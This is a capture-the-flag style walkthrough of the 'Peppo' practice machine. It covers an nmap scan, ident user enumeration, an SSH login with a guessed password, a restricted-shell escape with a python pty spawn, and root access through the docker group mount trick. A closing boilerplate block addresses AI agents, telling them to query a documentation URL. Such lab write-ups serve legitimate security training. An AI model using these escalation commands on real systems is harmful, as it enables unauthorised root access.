# Peppo

<figure><img src="/files/5dN9mT65RPg2ZDgh5m1z" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

As `ident` is running we can use the Perl script `ident-user-enum` to identify which services are running under what user.

<figure><img src="/files/6l7cfTAPJIr0No17fKMM" alt=""><figcaption></figcaption></figure>

Port 10000 reports it is running under the user 'Eleanor'. I tried Bruteforcing the username on `SSH` and had no luck. Eventually simply trying `eleanor:elenaor` I was able to log in on SSH.

<figure><img src="/files/1KM0olbJZlxsC4UvofYM" alt=""><figcaption></figcaption></figure>

We see from trying the `id` the command we are locked in with a restricted bash shell. We can check out our command availability by viewing what binaries we have access to.

<figure><img src="/files/a3vyGGDcs6zA8cxHDMOR" alt=""><figcaption></figcaption></figure>

Checking GTFObins for any of these binaries can spawn a shell to escape a restricted one:

<figure><img src="/files/A3R6lhIziB2BxHBHa4YB" alt=""><figcaption></figcaption></figure>

After running the above command we can export a new path and then spawn a Python shell then again export the path to having full function over the shell session.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

<figure><img src="/files/DQVAXcGe6Gr55z8cuzq3" alt=""><figcaption></figcaption></figure>

The command `id` shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

<figure><img src="/files/jiWcMkmsEXZ5S0NVTBxy" alt=""><figcaption></figcaption></figure>

First, check what images we have available to us:

```
docker image ls
```

We can use the GTFObins command to replace the value `<alpine>` with one of the images listed above.

```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

Returning a shell as root:

<figure><img src="/files/cWbsZIvT2AaA8vLC9dUm" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
If you found this page helpful to you, please rate it below as per the feedback options. For any corrections or general communications, please see the root page [**Pentest Everything**](http://localhost:5000/s/-MFlgUPYI8q83vG2IJpI/) for contact information.
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://fg0x0.gitbook.io/fg0x0s-notes/offensive-security/pg-practice/try-harder/peppo.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.